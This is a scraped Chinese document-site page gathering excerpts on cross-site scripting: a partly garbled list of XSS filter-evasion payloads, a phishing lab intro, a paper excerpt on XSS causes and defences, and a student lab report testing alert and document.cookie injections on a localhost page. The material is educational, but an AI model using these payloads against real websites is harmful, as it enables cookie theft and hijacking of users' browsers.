type="text/css"></p><h2>脚本攻击大全xss</h2><p>https://www.wendangku.net/doc/e516009314.html, -https://www.wendangku.net/doc/e516009314.html,/articles/hacker/base/2011/0401/13846.html xss跨站脚本攻击大全 (1)普通的XSS JavaScript注入 SCRIPT SRC=https://www.wendangku.net/doc/e516009314.html,/XSS/xss.js/SCRIPT (2)IMG标签XSS使用JavaScript命令 SCRIPT SRC=https://www.wendangku.net/doc/e516009314.html,/XSS/xss.js/SCRIPT (3)IMG标签无分号无引号 IMG SRC=javascript:alert(XSS) (4)IMG标签大小写不敏感 IMG SRC=JaVaScRiP (1)普通的XSS JavaScript注入 <SCRIPT SRC=https://www.wendangku.net/doc/e516009314.html,/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=https://www.wendangku.net/doc/e516009314.html,/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号) <IMG SRC=javascript:alert(“XSS”)> (6)修正缺陷IMG标签 <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> (7)formCharCode标签(计算器) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav..省略..S')> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC=jav..省略..S')> (10)十六进制编码也是没有分号(计算器) <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29> (11)嵌入式标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (12)嵌入式编码标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (13)嵌入式换行符 <IMG SRC=”jav ascript:alert(‘XSS’);”> (14)嵌入式回车 <IMG SRC=”jav ascript:alert(‘XSS’);”> (15)嵌入式多行注入JavaScript,这是XSS极端的例子 <IMG SRC=”javascript:alert(‘XSS‘)”></p><h2>实验三网站钓鱼攻击实验报告分析</h2><p>南京工程学院实验报告题目网站钓鱼攻击课程名称网络与信息安全技术院（系、部、中心）计算机工程学院专业网络工程班级学生姓名学号设计地点信息楼A216 指导教师毛云贵实验时间 2014年3月20日实验成绩</p><p>一实验目的 1.了解钓鱼攻击的概念和实现原理 2.了解钓鱼网站和正常网站的区别 3.提高抵御钓鱼攻击的能力二实验环境 Windows，交换网络结构，UltraEdit 三实验原理 3.1．什么是钓鱼网站网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感信息（如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息）的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上，并获取收信人在此网站上输入的个人敏感信息，通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力，因为这些信息使得他们可以假冒受害者进行欺诈性金融交易，从而获得经济利益。受害者经常遭受严重的经济损失或个人信息被窃取。钓鱼网站通常伪装成为银行网站，窃取访问者提交的账号和密码信息。它一般通过电子邮件传播，此类邮件中包含一个经过伪装的链接，该链接将收件人链接到钓鱼网站。钓鱼网站的页面与真实网站界面完全一致，要求访问者提交账号和密码。一般来说钓鱼网站结构很简单，只是一个或几个页面，URL和真实网站有细微差别，如真实的工行网站为https://www.wendangku.net/doc/e516009314.html,，针对工行的钓鱼网站则可能为https://www.wendangku.net/doc/e516009314.html,。 3.2．钓鱼网站的防范措施 1.启用专用域名现在的网址有好几种，https://www.wendangku.net/doc/e516009314.html,是一个商业性网站，而https://www.wendangku.net/doc/e516009314.html,是政府网</p><h2>跨网站脚本攻击(XSS)的原理与防范对策</h2><p>跨网站脚本攻击（XSS）的原理与防范对策摘要：随着计算机网络技术的迅速发展，网络安全问题已变得越来越受到人们的重视，网络攻击形式多种多样，很多蠕虫病毒、木马病毒等植入到某些网页中，给网络用户带来了很大的安全隐患。其中XSS跨网站脚本攻击，恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。本文主要阐述了XSS的机理和特点，重点分析了网页代码的检测以及木马的特征，并针对这些特点进行了一些相应防范对策的探讨。关键词：网页木马； XSS；攻击；防范一、前言网页木马是一种新型的恶意代码，一些攻击者将它人为的植入到服务器端的HTML页面中，通过客户端对服务器的访问来传播恶意攻击代码，它主要是通过浏览器以及其中的一些插件漏洞来进行植入，网页木马是一种客户端的攻击方式，它能有效的绕过防火墙的检测，隐秘的在客户端将恶意代码植入，客户端在不知情的情况下将这些恶意可执行程序进行下载和执行。给互联网用户造成严重的安全威胁。在Web 2.0出现以后，XSS的危害性达到了十分严重的地步。跨站脚本英文名称是（Cross Site Script），为了与层叠样式表（Cascading Style Sheets简称CSS）区分，故命名为XSS。 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据，用户认为该页面是可信赖的，但是当浏览器下载该页面时，嵌入其中的脚本将被解释执行。XSS 具有自身的独有特点，目前国内外很多研究人员围绕XSS的防御进行了深入的探讨与研究，同时攻击者也在采用一些更先进的手段来提高木马的攻击隐蔽性，用以提高木马的攻击成功率，因此，XSS的机理与防范对策研究已成为了当前计算机工作者的一个重要课题。二、XSS的机理与特征 1.XSS的成因跨网站脚本XSS漏洞的成因其实就是Html的注入问题，攻击者的输入没有经过严格的控制进入了数据库，最终显示给来访的用户，导致可以在来访用户的浏览器里以浏览用户的身份执行Html代码，数据流程如下：攻击者的Html输入—>web程序—>进入数据库—>web 程序—>用户浏览器。目前，所有的网站上几乎都提供一个站内或站外信息搜索框。在此搜索框中，您可以搜索到网站上任何可用的东西。这个搜索表单看起来这样：</p><h2>跨站脚本攻击(xss)实验报告</h2><p>北京理工大学珠海学院实验报告 ZHUHAI CAMPAUS OF BEIJING INSTITUTE OF TECHNOLOGY 实验题目跨站脚本攻击（xss）实验实验时间 2014.5.13 一、实验目的：了解跨站脚本，并知道如何发现跨站脚本及如何利用跨站脚本二、实验内容以及步骤： (1)打开Windows实验台，然后在IE浏览器中输入http://localhost/xss-test.asp，得到如图所示的界面，此网页可以直接输出文本框中输入的内容。 (2)尝试输入任意字符、符号、数字，查看网页，如下所示。图3.6.2-2 输入字母“wwww123”所得页面图3.6.2-3 输入数字“pppp456” 从上面的图片可以看出，页面是显示正常的。 (3)检测能否XSS 在输入栏中分别输入： <script>alert(/XSS/)</script> 弹出提示框 <img src="javascript:alert('XSS')"> 弹出提示框 <script>alert(document.cookie)</script> 弹出用户COOKIES <iframe src=http://localhost/xss-test.asp> 在当前页插入另一站点并查看效果，效果分别如下所示。

通过上面的实验，能够看出，由于页面对于特殊符号未进行过滤，导致了跨站的产生，如果这时标签内所嵌入的网站，进行了属性的修饰，设定了页面的宽度和高度，而且都设置为0，那么所内嵌的页面就不会显示。三、思考题： 1、跨站脚本攻击原理用户提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中，一个恶意用户提交的Html代码被其它浏览该网站的用户访问，通过这些Html代码也就间接控制了浏览者的浏览器，就可以做很多的事情，如：窃取敏感信息、引导访问者的浏览器去访问恶意网站等。 2. XSS攻击的两种方式内跨站(来自自身的攻击)主要指的是利用程序自身的漏洞，构造跨站语句。外跨站(来自外部的攻击)主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。</p></div> <div class="pagiv"> </div> </div> <div> <div>相关文档</div> <div class="relatedtopic"> <div id="tabs-section" class="tabs"> <ul class="tab-head"> <li id="13915483"><a href="/topic/13915483/" target="_blank">跨站脚本攻击实例解析</a></li> <li id="10647633"><a href="/topic/10647633/" target="_blank">跨站脚本攻击</a></li> <li id="22703797"><a href="/topic/22703797/" target="_blank">攻击实验报告</a></li> </ul> </div> </div> </div> </div> <div class="category"> <span class="navname">相关文档</span> <ul class="lista"> <li><a href="/doc/1c5153930.html" target="_blank">跨站脚本攻击--原理、检测与防御</a></li> <li><a href="/doc/d47683580.html" target="_blank">跨网站脚本攻击(XSS)的原理与防范对策</a></li> <li><a href="/doc/0d4966150.html" target="_blank">XSS跨站脚本攻击技术与防范</a></li> <li><a href="/doc/787852432.html" target="_blank">跨站脚本攻击论文</a></li> <li><a href="/doc/e516009314.html" target="_blank">跨站脚本攻击(xss)实验报告</a></li> <li><a href="/doc/171738759.html" target="_blank">XSS跨站脚本攻击技术</a></li> <li><a href="/doc/cf17122184.html" target="_blank">jsp跨站脚本攻击漏洞处理</a></li> <li><a href="/doc/6c5756857.html" target="_blank">跨站脚本攻击的危害和防护方法</a></li> <li><a href="/doc/ed14625847.html" target="_blank">跨站点脚本攻击演示</a></li> <li><a href="/doc/0a15413947.html" target="_blank">3-跨站脚本攻击(XSS)实训操作</a></li> <li><a href="/doc/ac711878.html" target="_blank">XSS跨站脚本攻击详述</a></li> <li><a href="/doc/2514930242.html" target="_blank">跨网站脚本攻击(XSS)的原理与防范对策</a></li> <li><a href="/doc/d018583319.html" target="_blank">网络攻击技术及攻击实例介绍</a></li> <li><a href="/doc/0513327396.html" target="_blank">跨站脚本攻击实例解析</a></li> <li><a href="/doc/9112321774.html" target="_blank">跨站脚本攻击XSS攻击与防范指南</a></li> <li><a href="/doc/f48918292.html" target="_blank">跨站脚本攻击-sql注入-web脚本攻击-网页挂马-详细过程及主要代码</a></li> </ul> <span class="navname">最新文档</span> <ul class="lista"> <li><a href="/doc/0719509601.html" target="_blank">幼儿园小班科学《小动物过冬》PPT课件教案</a></li> <li><a href="/doc/0e19509602.html" target="_blank">2021年春新青岛版(五四制)科学四年级下册 20.《露和霜》教学课件</a></li> <li><a href="/doc/9319184372.html" target="_blank">自然教育课件</a></li> <li><a href="/doc/3019258759.html" target="_blank">小学语文优质课火烧云教材分析及课件</a></li> <li><a href="/doc/db19211938.html" target="_blank">(超详)高中语文知识点归纳汇总</a></li> <li><a href="/doc/af19240639.html" target="_blank">高中语文基础知识点总结(5篇)</a></li> <li><a href="/doc/9919184371.html" target="_blank">高中语文基础知识点总结(最新)</a></li> <li><a href="/doc/8b19195909.html" target="_blank">高中语文知识点整理总结</a></li> <li><a href="/doc/8019195910.html" target="_blank">高中语文知识点归纳</a></li> <li><a href="/doc/7f19336998.html" target="_blank">高中语文基础知识点总结大全</a></li> <li><a href="/doc/7a19336999.html" target="_blank">超详细的高中语文知识点归纳</a></li> <li><a href="/doc/6719035160.html" target="_blank">高考语文知识点总结高中</a></li> <li><a href="/doc/6a19035161.html" target="_blank">高中语文知识点总结归纳</a></li> <li><a href="/doc/4d19232289.html" target="_blank">高中语文知识点整理总结</a></li> <li><a href="/doc/3a19258758.html" target="_blank">高中语文知识点归纳</a></li> <li><a href="/doc/2519396978.html" target="_blank">高中语文知识点归纳(大全)</a></li> <li><a href="/doc/2419396979.html" target="_blank">高中语文知识点总结归纳(汇总8篇)</a></li> <li><a href="/doc/1f19338136.html" target="_blank">高中语文基础知识点整理</a></li> <li><a href="/doc/ef19066069.html" target="_blank">化工厂应急预案</a></li> <li><a href="/doc/bc19159069.html" target="_blank">化工消防应急预案(精选8篇)</a></li> </ul> </div> </div> <script> var sdocid = "ed78072e5e0e7cd184254b35eefdc8d376ee14f3"; </script> <div class="footer"> <p><a href="/tousu.html" target="_blank">侵权投诉</a>  © 2013-2023 www.wendangku.net  <a href="/sitemap.html">站点地图</a> | <a href="https://m.wendangku.net">手机版</a></p> <p><a href="https://beian.miit.gov.cn" target="_blank">闽ICP备11023808号-7</a>  本站文档均来自互联网及网友上传分享，本站只负责收集和整理，有任何问题可通过上访投诉通道进行反馈</p> </div> <script type="text/javascript">foot();</script> </div> </body> </html>